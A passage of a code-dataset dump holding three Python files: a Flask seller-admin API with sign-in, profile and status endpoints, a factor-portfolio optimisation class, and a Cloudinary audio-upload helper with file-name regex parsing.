in filename and \\\r\n            filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n    @user_app.route('/signup', methods=['POST'])\r\n    def sign_up():\r\n        \"\"\"\r\n        User sign-up\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n            data = request.json\r\n\r\n            if not data:\r\n                raise RequestException\r\n            # KeyError exception handling\r\n            keyword_validation.signup(data)\r\n\r\n            user_service.sign_up(db, data)\r\n            db.commit()\r\n\r\n            return jsonify({'message' : 'success'}), 200\r\n        except RequestException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except ExistsException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except KeyError as e:\r\n            db.rollback()\r\n            return jsonify({'message': format(e)}), 400\r\n        except Exception as e:\r\n            db.rollback()\r\n            return jsonify({'message' : 'server error : {}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n\r\n    @user_app.route('/signin', methods=['POST'])\r\n    def sign_in():\r\n        \"\"\"\r\n        User sign-in\r\n        account, password\r\n        :return: access_token\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n            data = request.json\r\n\r\n            if not data:\r\n                raise RequestException\r\n            # KeyError exception handling\r\n            keyword_validation.signin(data)\r\n\r\n            access_token = user_service.sign_in(db, data)\r\n            db.commit()\r\n\r\n            return jsonify({'message' : 'success', 'access_token' : access_token}), 200\r\n        except RequestException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except PermissionException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except NotExistsException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except KeyError as e:\r\n            db.rollback()\r\n            return jsonify({'message': format(e)}), 400\r\n        except Exception as e:\r\n            db.rollback()\r\n            return jsonify({'message' : 'error {}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n\r\n    @user_app.route('/category', methods=['GET'])\r\n    def seller_category_type():\r\n        \"\"\"\r\n        Fetch the seller category types\r\n        :return: category list\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n\r\n            category_list = user_service.seller_category_type(db)\r\n\r\n            return jsonify({'message' : 'success', 'category_list' : category_list}), 200\r\n        except Exception as e:\r\n            return jsonify({'message' : 'error {}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n
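\r\n    # Editor's note (illustrative request/response shapes, inferred from the\r\n    # handlers above; the values are placeholders, not taken from this file):\r\n    #   POST /user/signin {\"account\": \"...\", \"password\": \"...\"}\r\n    #     -> 200 {\"message\": \"success\", \"access_token\": \"...\"}\r\n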
    @user_app.route('', methods=['GET'])\r\n    @login_decorator\r\n    def get_seller_list():\r\n        \"\"\"\r\n        Seller list with total count\r\n        permission denied unless the token belongs to a master\r\n        invalid input 'key' in filters when a filter key is wrong\r\n        raises an exception when end_date is earlier than start_date\r\n        :return: seller list and total count\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n\r\n            if not request.is_master:\r\n                raise PermissionException\r\n\r\n            filter_list = ['id', 'account', 'name_en', 'name_ko',\r\n                           'manager_name', 'manager_mobile', 'manager_email',\r\n                           'category', 'start_date', 'end_date',\r\n                           'offset', 'limit']\r\n\r\n            filters = dict(request.args)\r\n\r\n            for key in filters:\r\n                if key not in filter_list:\r\n                    return jsonify({'message' : \"'{}' is not a valid search filter key.\".format(key)}), 400\r\n\r\n            if ('start_date' in filters) and ('end_date' in filters):\r\n                if filters['end_date'] < filters['start_date']:\r\n                    raise InvalidValueException(\"The 'end date' cannot be earlier than the 'start date'.\", 400)\r\n\r\n            if ('offset' in filters) and (int(filters['offset']) <= 0):\r\n                raise InvalidValueException(\"The page number must be an integer greater than or equal to 1.\", 400)\r\n\r\n            if ('limit' in filters) and (int(filters['limit']) <= 0):\r\n                raise InvalidValueException(\"The number of rows per page must be an integer greater than or equal to 1.\", 400)\r\n\r\n            sellers = user_service.get_seller_list(db, filters)\r\n\r\n            return jsonify({'message' : 'success', 'total_count' : sellers['count'],\r\n                            'seller_list' : sellers['seller_list']}), 200\r\n\r\n        except PermissionException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except InvalidValueException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except Exception as e:\r\n            return jsonify({'message' : 'error {}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n\r\n    @user_app.route('/my_page', methods=['GET'])\r\n    @user_app.route('/my_page/<int:seller_id>', methods=['GET'])\r\n    @login_decorator\r\n    def get_seller_information(**seller_id):\r\n        \"\"\"\r\n        Fetch seller detail information\r\n        'require parameter' when a master token is used without the seller_id path parameter\r\n        'permission denied' when a seller token is used with a seller_id parameter\r\n        :return: seller detail information\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n\r\n            # master\r\n            if request.is_master:\r\n                if not seller_id:\r\n                    raise PathParameterException('seller_id')\r\n\r\n                seller_id = seller_id['seller_id']\r\n            # seller\r\n            else:\r\n                if seller_id:\r\n                    raise PermissionException\r\n\r\n                seller_id = request.seller_id\r\n\r\n            seller_info = user_service.get_seller_information(db, seller_id)\r\n\r\n            return jsonify({'message' : 'success', 'seller_info': seller_info}), 200\r\n        except PathParameterException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except PermissionException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except NotExistsException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except Exception as e:\r\n            return jsonify({'message' : 'error {}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n
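\r\n    # Editor's note (illustrative only): the list endpoint above accepts the\r\n    # whitelisted query filters, e.g.\r\n    #   GET /user?manager_name=kim&start_date=2020-01-01&end_date=2020-12-31&offset=1&limit=10\r\n    # Unknown keys are rejected with a 400 response.\r\n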
    @user_app.route('/my_page', methods=['PUT'])\r\n    @user_app.route('/my_page/<int:seller_id>', methods=['PUT'])\r\n    @login_decorator\r\n    def update_seller_information(**seller_id):\r\n        \"\"\"\r\n        Update seller detail information\r\n        'require parameter' when a master token is used without the seller_id path parameter\r\n        'permission denied' when a seller token is used with a seller_id parameter\r\n        :param seller_id: seller_id\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n            s3 = s3_connection()\r\n            form_data = dict(request.form)\r\n\r\n            if not form_data:\r\n                raise RequestException\r\n\r\n            data = json.loads(form_data['body'])\r\n\r\n            # check the file extensions\r\n            if request.files:\r\n                profile_image = request.files['profile_image'] if 'profile_image' in request.files else None\r\n                if profile_image and not allowed_file(profile_image.filename):\r\n                    raise FileException('This file extension is not allowed.', 400)\r\n                data['profile_image'] = profile_image if profile_image.filename else None\r\n\r\n                background_image = request.files['background_image'] if 'background_image' in request.files else None\r\n                if background_image and not allowed_file(background_image.filename):\r\n                    raise FileException('This file extension is not allowed.', 400)\r\n                data['background_image'] = background_image if background_image.filename else None\r\n\r\n                # check the image size (width, height)\r\n                if background_image:\r\n                    image = Image.open(background_image)\r\n                    width, height = image.size\r\n\r\n                    if width < 1200 or height < 850:\r\n                        raise FileException('The background image must be at least 1200 pixels wide and 850 pixels tall.', 400)\r\n\r\n                    # reset the file stream pointer\r\n                    background_image.seek(0)\r\n\r\n            # KeyError exception handling\r\n            keyword_validation.update_seller_information(data)\r\n\r\n            # master\r\n            if request.is_master:\r\n                if not seller_id:\r\n                    raise PathParameterException('seller_id')\r\n\r\n                seller_id = seller_id['seller_id']\r\n                modifier_id = request.seller_id\r\n            # seller\r\n            else:\r\n                if seller_id:\r\n                    raise PermissionException\r\n\r\n                seller_id = request.seller_id\r\n                modifier_id = request.seller_id\r\n\r\n            user_service.update_seller_information(db, data, s3, seller_id, modifier_id)\r\n\r\n            db.commit()\r\n\r\n            return jsonify({'message' : 'success'}), 200\r\n        except RequestException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except RequestEntityTooLarge:\r\n            db.rollback()\r\n            return jsonify({'message' : 'Image files must be 5MB or smaller.'}), 400\r\n        except FileException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except PathParameterException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except InvalidValueException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except PermissionException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except KeyError as e:\r\n            db.rollback()\r\n            return jsonify({'message' : 'key_error {}'.format(e)}), 400\r\n        except Exception as e:\r\n            db.rollback()\r\n            return jsonify({'message' : '{}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n\r\n    @user_app.route('/<int:seller_id>', methods=['PATCH'])\r\n    @login_decorator\r\n    def update_shop_status(seller_id):\r\n        \"\"\"\r\n        Update the seller's store status\r\n        permission denied unless the token belongs to a master\r\n        :param seller_id: seller_id\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n            data = request.json\r\n\r\n            if not data:\r\n                raise RequestException\r\n            # KeyError exception handling\r\n            keyword_validation.update_shop_status(data)\r\n\r\n            if not request.is_master:\r\n                raise PermissionException\r\n\r\n            user_service.update_shop_status(db, data, seller_id)\r\n\r\n            db.commit()\r\n\r\n            return jsonify({'message' : 'success'}), 200\r\n        except RequestException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except PermissionException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except NotExistsException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except InvalidValueException as e:\r\n            db.rollback()\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except KeyError as e:\r\n            db.rollback()\r\n            return jsonify({'message' : 'key_error {}'.format(e)}), 400\r\n        except Exception as e:\r\n            db.rollback()\r\n            return jsonify({'message' : '{}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n
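\r\n    # Editor's note (illustrative only): the PUT handler above expects\r\n    # multipart/form-data with a JSON string in the 'body' field plus optional\r\n    # 'profile_image' / 'background_image' files; the PATCH handler expects a\r\n    # plain JSON body (its exact keys are validated by keyword_validation and\r\n    # are not shown in this file).\r\n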
    @user_app.route('/my_page/history', methods=['GET'])\r\n    @user_app.route('/my_page/<int:seller_id>/history', methods=['GET'])\r\n    @login_decorator\r\n    def get_seller_status_log(**seller_id):\r\n        \"\"\"\r\n        Fetch the seller's status history\r\n        :param seller_id: seller_id\r\n        :return: history list (time, store status, modifier)\r\n        \"\"\"\r\n\r\n        db = None\r\n        try:\r\n            db = db_connection()\r\n\r\n            if request.is_master:\r\n                if not seller_id:\r\n                    raise PathParameterException('seller_id')\r\n\r\n                seller_id = seller_id['seller_id']\r\n            else:\r\n                if seller_id:\r\n                    raise PermissionException\r\n\r\n                seller_id = request.seller_id\r\n\r\n            log_list = user_service.get_seller_status_log(db, seller_id)\r\n\r\n            return jsonify({'message' : 'success', 'log_list' : log_list}), 200\r\n        except PathParameterException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except PermissionException as e:\r\n            return jsonify({'message' : e.message}), e.status_code\r\n        except Exception as e:\r\n            return jsonify({'message' : '{}'.format(e)}), 500\r\n        finally:\r\n            if db:\r\n                db.close()\r\n\r\n    return user_app\r\n","sub_path":"back_end/brandi-project/view/user_view.py","file_name":"user_view.py","file_ext":"py","file_size_in_byte":14902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"574446826","text":"import pandas as pd\nimport numpy as np\nfrom cvxopt import matrix, solvers\nimport warnings\nimport matplotlib.pyplot as plt\nimport copy\nimport scipy.optimize\n\nsolvers.options['show_progress'] = False\nsolvers.options['abstol'] = 1e-14\n\n\nclass FactorPortfolio(object):\n\n    def __init__(self,**kwargs):\n        self.mu = kwargs.get('mu')\n        self.sd = kwargs.get('sd')\n        self.ir = kwargs.get('ir')\n        self.desc = kwargs.get('desc')\n        self.accuracy = 1e-12\n        self.mu_min = np.nan\n        self.mu_max = np.nan\n        self.risk_tolerance_parameter = np.nan\n        \n        if self.desc is None:\n            self.desc = 'INITIAL PORTFOLIO'\n        \n        self.factor_mu = kwargs.get('factor_mu')\n        self.factor_cov = kwargs.get('factor_cov')\n        self.factor_weights = kwargs.get('factor_weights')\n        self.factor_name = kwargs.get('factor_name')\n        \n        if self.factor_name is None:\n            if isinstance(self.factor_mu,pd.DataFrame):\n                self.factor_name = self.factor_mu.index\n            elif isinstance(self.factor_cov,pd.DataFrame):\n                self.factor_name = self.factor_cov.index\n            elif isinstance(self.factor_weights,pd.DataFrame):\n                self.factor_name = self.factor_weights.index\n            else:\n                self.factor_name = pd.Index(['Factor_1'])\n        \n        self.n = self.factor_name.__len__()\n        \n        if self.factor_mu is None:\n            self.factor_mu = pd.DataFrame({'mu':np.repeat(np.nan,self.n,0),},index=self.factor_name)\n        else:\n            self.mu_min = np.ceil(self.factor_mu.min()[0]/self.accuracy)*self.accuracy\n            self.mu_max = np.floor(self.factor_mu.max()[0]/self.accuracy)*self.accuracy\n        \n        if self.factor_cov is None:\n            tmp = np.empty((self.n,self.n,))\n            tmp[:] = np.nan\n            self.factor_cov = pd.DataFrame(tmp,index=self.factor_name,columns=self.factor_name)\n        \n        if self.factor_weights is None:\n            self.factor_weights = pd.DataFrame({'weights':np.repeat(np.nan,self.n,0),},index=self.factor_name) \n        \n        if self.mu is None:\n            self.mu = np.dot(self.factor_weights.T,self.factor_mu)[0,0]\n        \n        if self.sd is None:\n            self.sd = np.sqrt(np.dot(np.dot(self.factor_weights.T,self.factor_cov),self.factor_weights))[0,0]\n        \n        if self.ir is None:\n            self.ir = self.mu / self.sd\n    \n    def calc_mu(self):\n        self.mu = np.dot(self.factor_weights.T,self.factor_mu)[0,0]\n    \n    def calc_sd(self):\n        self.sd = np.sqrt(np.dot(np.dot(self.factor_weights.T,self.factor_cov),self.factor_weights))[0,0]\n    \n    def calc_ir(self):\n        self.ir = self.mu / self.sd\n    \n    def calc_weights_min_variance(self):\n        P = 2*matrix(self.factor_cov.as_matrix())\n        q = matrix(np.repeat(0.0,self.n))\n        G = matrix(np.diagflat(np.repeat(-1.0,self.n)))\n        h = matrix(np.repeat(0.0,self.n))\n        A = matrix(np.repeat(1.0,self.n)).T\n        b = matrix([1.0])\n        sol = solvers.qp(P, q, G, h, A, b)\n        wgt = pd.DataFrame({'weights': pd.Series(sol['x']),})\n        wgt.index = self.factor_name\n        self.factor_weights = wgt\n        self.desc = 'MINIMUM VARIANCE PORTFOLIO'\n        self.calc_mu()\n        self.calc_sd()\n        self.calc_ir()\n    \n    \n    def calc_risk_tolerance_parameter(self):\n        self.risk_tolerance_parameter = 2 * np.power(self.sd,2) / self.mu\n    \n    def calc_marginal_utility_ir(self):\n        self.calc_risk_tolerance_parameter()\n        self.marginal_utility_ir = np.multiply(self.factor_mu - 
2.0/self.risk_tolerance_parameter * np.dot(self.factor_cov,self.factor_weights),self.factor_weights)\n self.marginal_utility_ir.columns = pd.Index(['marginal_utility_ir'])\n \n def calc_weights_max_ir(self):\n \n if self.factor_mu.max()['mu'] < 0:\n self.calc_weights_target_mu(mu=self.factor_mu.max()['mu'])\n self.desc = 'MAXIMUM IR PORTFOLIO'\n else:\n self.calc_weights_target_mu(mu=self.factor_mu[self.factor_mu>0].mean()['mu'])\n self.calc_risk_tolerance_parameter() \n \n rtLast = self.risk_tolerance_parameter + 100*self.accuracy\n \n while np.abs(rtLast - self.risk_tolerance_parameter) > self.accuracy:\n rtLast = self.risk_tolerance_parameter\n P = matrix(2.0/self.risk_tolerance_parameter*self.factor_cov.as_matrix())\n q = matrix(-1.0*self.factor_mu.as_matrix())\n G = matrix(np.diagflat(np.repeat(-1.0,self.n)))\n h = matrix(np.repeat(0.0,self.n))\n A = matrix(np.repeat(1.0,self.n)).T\n b = matrix([1.0])\n sol = solvers.qp(P, q, G, h, A, b)\n wgt = pd.DataFrame({'weights': pd.Series(sol['x']),})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'MAXIMUM IR PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n self.calc_risk_tolerance_parameter()\n #print(self.ir)\n \n def calc_weights_max_ir_n(self,n=4):\n \n def f(ix):\n tmp = FactorPortfolio(factor_mu=self.factor_mu.loc[ix],factor_cov=self.factor_cov.loc[ix,ix])\n tmp.calc_weights_max_ir()\n return(tmp.ir)\n\n idx = self.factor_name \n while idx.__len__() > n:\n \n loopOver = [idx[idx != i] for i in idx] # loopOver.__len__()\n res = np.array([f(i) for i in loopOver]) # res.__len__()\n print('drop factor: ' + idx[res.argmax()])\n idx = loopOver[res.argmax()]\n \n bestIR = res[res.argmax()] \n bestIdx = idx\n runOptim = True\n \n while runOptim:\n idx = bestIdx \n idxRest = pd.Index(np.setdiff1d(np.array(self.factor_name),np.array(idx)))\n loopOver = [idx[idx != i].append(pd.Index([k])) for i in idx for k in idxRest]\n res = np.array([f(i) for i in loopOver])\n \n if res[res.argmax()] > bestIR:\n bestIR = res[res.argmax()]\n print('add factor: ' + np.setdiff1d(np.array(loopOver[res.argmax()]), np.array(bestIdx)).__str__())\n print('remove factor: ' + np.setdiff1d(np.array(bestIdx),np.array(loopOver[res.argmax()])).__str__())\n bestIdx = loopOver[res.argmax()]\n else:\n runOptim = False\n \n tmp = FactorPortfolio(factor_mu=self.factor_mu.loc[bestIdx],factor_cov=self.factor_cov.loc[bestIdx,bestIdx])\n tmp.calc_weights_max_ir()\n \n self.factor_weights['weights'][:] = 0\n self.factor_weights['weights'][bestIdx] = tmp.factor_weights['weights'][bestIdx] \n self.desc = 'MAXIMUM IR[N] PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n \n \n \n \n def calc_weights_target_mu(self,**kwargs):\n mu = self.mu\n if 'mu' in kwargs:\n mu = kwargs.get('mu')\n if mu < self.factor_mu.min()[0]:\n mu = self.mu_min\n warnings.warn('mu too small --> [mu] rounded up to smallest possible value')\n \n if mu > self.factor_mu.max()[0]:\n mu = self.mu_max\n warnings.warn('mu too large --> [mu] rounded down to largest possible value')\n \n P = 2*matrix(self.factor_cov.as_matrix())\n q = matrix(np.repeat(0.0,self.n))\n G = matrix(np.diagflat(np.repeat(-1.0,self.n)))\n h = matrix(np.repeat(0.0,self.n))\n A = matrix(np.array([np.repeat(1.0,self.n),np.array(self.factor_mu['mu'])]))\n b = matrix([1.0,mu])\n sol = solvers.qp(P, q, G, h, A, b)\n \n wgt = pd.DataFrame({'weights' : pd.Series(sol['x'])})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'TARGET [mu] PORTFOLIO'\n self.calc_mu()\n 
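Editor's note: a standalone toy run of the same long-only, fully-invested quadratic program that `calc_weights_min_variance` and `calc_weights_target_mu` build (the covariance numbers below are invented). One portability note: `DataFrame.as_matrix()`, used throughout the class, was removed in pandas 1.0; `DataFrame.to_numpy()` is the modern replacement.

```python
import numpy as np
from cvxopt import matrix, solvers

solvers.options['show_progress'] = False

# Toy 3-factor covariance; minimize w' C w  s.t.  w >= 0 and sum(w) = 1.
C = np.array([[0.04, 0.01, 0.00],
              [0.01, 0.09, 0.02],
              [0.00, 0.02, 0.16]])
n = C.shape[0]

P = matrix(2 * C)            # cvxopt minimizes (1/2) x'Px + q'x, hence the 2
q = matrix(np.zeros(n))      # no linear term for pure variance minimization
G = matrix(-np.eye(n))       # -w <= 0  (long-only constraint)
h = matrix(np.zeros(n))
A = matrix(np.ones((1, n)))  # weights sum to one
b = matrix([1.0])

sol = solvers.qp(P, q, G, h, A, b)
w = np.array(sol['x']).ravel()
print(w, w @ C @ w)          # optimal weights and the resulting variance
```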
self.calc_sd()\n self.calc_ir()\n \n \n def calc_weights_target_risk(self,**kwargs):\n sd = self.sd\n if 'sd' in kwargs:\n sd = kwargs.get('sd')\n \n tmp = copy.copy(self)\n tmp.calc_weights_min_variance()\n \n if sd < tmp.sd:\n warnings.warn('sd too small --> [sd] based on minimum variance portfolio')\n self = copy.copy(tmp)\n \n \n \n \n \n \n \n def calc_weights_risk_parity(self):\n \n #w = np.repeat(1.0/self.n,self.n)\n cov = self.factor_cov.as_matrix()\n w = np.divide(1,np.sqrt(np.diag(cov)))\n w = np.divide(w,w.sum())\n \n \n if np.dot(np.matrix(w),np.dot(np.matrix(cov),np.matrix(w).T))[0,0] != 0: \n scale = 1.0/(np.dot(np.matrix(w),np.dot(np.matrix(cov),np.matrix(w).T))[0,0])\n else:\n scale = 1\n\n cov = cov * scale\n \n def riskParityScore(w):\n w = np.matrix(w)\n score=-np.log(w).sum()\n return score\n \n #def constr1(x, cov):\n # return 1 - np.sqrt(np.dot(np.matrix(x),np.dot(np.matrix(cov),np.matrix(x).T)))[0,0]\n\n cons = ({'type':'ineq','fun': lambda x: 1 - np.sqrt(np.dot(np.matrix(x),np.dot(np.matrix(cov),np.matrix(x).T)))[0,0]})\n res = scipy.optimize.minimize(riskParityScore, x0 = w, method='SLSQP' ,constraints = cons, tol=self.accuracy)\n #w = scipy.optimize.fmin_cobyla(riskParityScore, x0 = w, cons = constr1, consargs=(cov,),rhoend=self.accuracy)\n w = res['x']\n w = np.divide(w,w.sum())\n \n #mcr = np.multiply(np.dot(cov,w.T),w.T)\n #print('w:='+ w.__str__())\n #print('MCR:=' + mcr.__str__())\n wgt = pd.DataFrame({'weights' : pd.Series(w)})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'RISK PARITY PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n \n \n \n def plot(self,mu_steps=50):\n \n #mu = np.linspace(self.mu_min,self.mu_max,mu_steps)\n \n mu_f = np.array(self.factor_mu)\n mu_f.sort(0) \n mu = mu_f.copy().T[0]\n \n tmp = copy.copy(self)\n tmp.calc_weights_min_variance()\n mu_minVar = tmp.mu\n sd_minVar = tmp.sd\n \n mu = np.append(mu,mu_minVar)\n mu.sort()\n \n tmp.calc_weights_risk_parity()\n mu_rp = tmp.mu\n sd_rp = tmp.sd\n \n mu = np.append(mu,mu_rp)\n mu.sort()\n \n tmp.calc_weights_max_ir()\n mu_maxIR = tmp.mu\n sd_maxIR = tmp.sd\n ir_maxIR = tmp.ir\n \n mu = np.append(mu,mu_maxIR)\n mu.sort()\n \n while mu.__len__() < mu_steps: \n bigDiffId = np.diff(mu).argmax()\n mu = np.append(mu,mu[bigDiffId:(bigDiffId+2)].mean())\n mu.sort()\n \n # plt.plot(np.repeat(0,mu.__len__()),mu,'bo') \n \n def f(i):\n tmp.calc_weights_target_mu(mu=i)\n #print(i)\n #tmp.calc_weights_target_mu(mu=0.00163328532333)\n return(tmp.sd)\n sd = np.array([f(i) for i in mu])\n \n \n plt.plot(sd,mu,color='r',linewidth=1)\n \n plt.plot(sd_minVar,mu_minVar,'ro')\n plt.text(sd_minVar,mu_minVar,'MINIMUM VARIANCE PORTFOLIO')\n \n plt.plot(sd_rp,mu_rp,'ro')\n plt.text(sd_rp,mu_rp,'RISK PARITY PORTFOLIO')\n \n plt.plot(sd_maxIR,mu_maxIR,'ro')\n plt.text(sd_maxIR,mu_maxIR,'MAX IR PORTFOLIO')\n \n plt.plot([0,sd.max()],[0,sd.max()*ir_maxIR],'--')\n \n plt.plot([0,np.sqrt(np.diagonal(self.factor_cov)).max()*1.1],[0,0],color='k',linewidth=1)\n plt.plot(np.sqrt(np.diagonal(self.factor_cov)),self.factor_mu['mu'],'go')\n plt.axis([0, np.sqrt(np.diagonal(self.factor_cov)).max()*1.1,np.min([0-(mu.max()-mu.min())/10,mu.min()-(mu.max()-mu.min())/10]),mu.max()+(mu.max()-mu.min())/10])\n plt.grid(True)\n plt.xlabel(r'$\\sigma$',fontsize='large')\n plt.ylabel(r'$\\mu$',fontsize='large')\n plt.title(r'Portfolio')\n for i in range(self.n):\n plt.text(np.sqrt(np.diagonal(self.factor_cov))[i],self.factor_mu['mu'][i],self.factor_name.tolist()[i])\n \n \n if self.desc == 
'MAXIMUM IR[N] PORTFOLIO':\n            plt.plot(self.sd,self.mu,'ro')\n            plt.text(self.sd,self.mu,'MAXIMUM IR[N] PORTFOLIO')\n            \n            arrowIdx = self.factor_name[self.factor_weights['weights'] > 0]\n            \n            \n            arrowSx = np.sqrt(np.diag(self.factor_cov.loc[arrowIdx,arrowIdx]))\n            arrowSy = np.array(self.factor_mu['mu'][arrowIdx])\n            arrowEx = np.repeat(self.sd,arrowSy.__len__())\n            arrowEy = np.repeat(self.mu,arrowSy.__len__())\n            #arrowLx = arrowEx - arrowSx\n            #arrowLy = arrowEy - arrowSy\n            \n            #ax = plt.axes()\n            for i in range(arrowSy.__len__()):\n                plt.plot([arrowSx[i],arrowEx[i]],[arrowSy[i],arrowEy[i]],'--',color = 'k')\n                #ax.arrow(arrowSx[i],arrowSy[i],arrowLx[i],arrowLy[i],width=0.0000001,length_includes_head=True, head_width=0.00003, head_length=0.0005, fc='k', ec='k')\n        \n        plt.show()\n        \n        \n    def __repr__(self):\n        return(self.desc)\n        \n        \n","sub_path":"pytoolbox/pytoolbox/FactorPortfolio.py","file_name":"FactorPortfolio.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"640852259","text":"#!/usr/bin/env python3\n\nimport cloudinary\nimport cloudinary.api\nimport cloudinary.uploader\n\nimport re\nimport json\nimport os, datetime\nfrom pathlib import Path\n\nfrom model import Box\n\n# from mongodapi import MongoController\n\n\n\n# Initialize the cloudinary SDK\ncloudinary.config(\n    cloud_name = os.getenv('CLOUD_NAME'),\n    api_key = os.getenv('API_KEY'),\n    api_secret = os.getenv('API_SECRET')\n)\n\n\nclass Cloud:\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def upload(folder):\n        p = Path(folder).glob('*') # **/*\n        files = [x for x in p if x.is_file()]\n\n        for f in files:\n            print(f'Uploading {f} ...')\n\n            # Trim .mp3 extension(public_id REQUIRED) and Upload\n            cloudinary.uploader.upload(str(f), resource_type='video', public_id=f\"{f.name[0:-4]}\")\n\n    @staticmethod\n    def fetch(file_name=None, total=True):\n        assets = cloudinary.api.resources(\n            resource_type = \"video\",\n            type = \"upload\",\n            max_results = 200,\n            # direction = \"asc\",\n            # start_at = datetime_object\n            # tags = \"false\",\n        )\n        if file_name is not None:\n            if total is not True:\n                secureList = []\n                for resources in assets['resources']:\n                    secureList.append(resources['secure_url'])\n                with open(file_name, 'a+') as outfile:\n                    json.dump(secureList, outfile, indent=4, sort_keys=True)\n            else:\n                with open(file_name, 'w+') as outfile:\n                    json.dump(assets, outfile, indent=4, sort_keys=True)\n        else:\n            return assets\n\n\nclass CardRegex:\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def regex_model():\n        return re.compile(r'''(\n            ([a-zA-Z]+)             # 1 - Group\n            (_)\n            ([a-zA-Z]+)             # 3 - Card's Name\n            (_)\n            ([a-zA-Z]+)             # 5 - Box's Name\n            (_)\n            ([0-9]+)                # 7 - Value\n            (__)\n            ([0-9a-zA-Z-,()]+)      # 9 - Description\n            (__)?\n            (\\w+)?                 
# 11 - Author\n )''', re.VERBOSE)\n \n @staticmethod\n def new_regex():\n return re.compile(r'''(\n ([a-zA-Z]+) # 1 - Group\n _\n ([a-zA-Z]+) # 2 - Card's Name\n _\n ([a-zA-Z]+) # 3 - Box's Name\n _?\n (\\d)?\n )''', re.VERBOSE)\n\n\n @staticmethod\n def extract_assets(assets):\n cards = []\n\n for resources in assets['resources']:\n\n path = Path(resources['public_id'])\n url = resources['url']\n\n regex = CardRegex.regex_model()\n for groups in regex.findall(path.name):\n query = {'group': groups[1], 'name': groups[3]}\n\n name = groups[5]\n level = groups[7]\n des = name + ' ' + groups[9].replace('-', ' ')\n author = groups[11]\n \n box = Box(name, level, url, des, author)\n value = {'boxes': box.document}\n \n card = {'query': query, 'value': value}\n cards.append(card)\n\n return cards\n\n @staticmethod\n def read_and_extract(file_name):\n f = open(file_name, 'r')\n surl_list = f.read().splitlines()\n f.close()\n\n data = []\n # for i in range(int(len(surl_list) / 2)):\n # print(surl_list[i*2])\n # print(surl_list[i*2+1])\n\n for i in range(int(len(surl_list) / 2)):\n glue = surl_list[i*2] # 0 - glue\n audio = surl_list[i*2+1] # 1 - audio\n \n regex = CardRegex.new_regex()\n for groups in regex.findall(audio):\n level = None\n if (groups[4]):\n level = int(groups[4])\n \n query = {'group': groups[1], 'name': groups[2]}\n value = {'boxes': {\n 'name': groups[3],\n 'level': level,\n 'audio': audio,\n 'glue': glue}\n }\n small_data = {'query': query, 'value': value}\n data.append(small_data)\n \n return data\n # with open('hi.json', 'w+') as outfile:\n # json.dump(data, outfile, indent=4, sort_keys=True)\n\n \n\n\n\nif __name__ == '__main__':\n pass\n # cloud = Cloud('/home/test/Music/audio/urban_compressed')\n # time_now = datetime.datetime.now()\n # print(time_now)\n # timenow = \"2019-10-02 11:32:57\"\n # datetime_object = datetime.datetime.strptime(timenow, '%Y-%m-%d %H:%M:%S')\n\n # cloud.upload()\n\n# assets = cloudinary.Search().expression('Cave').execute()\n\n# Regexes\n# publicid_regex = re.compile(r'(\"public_id\": )(\".*\")')\n# url_regex = re.compile(r'(\"url\": 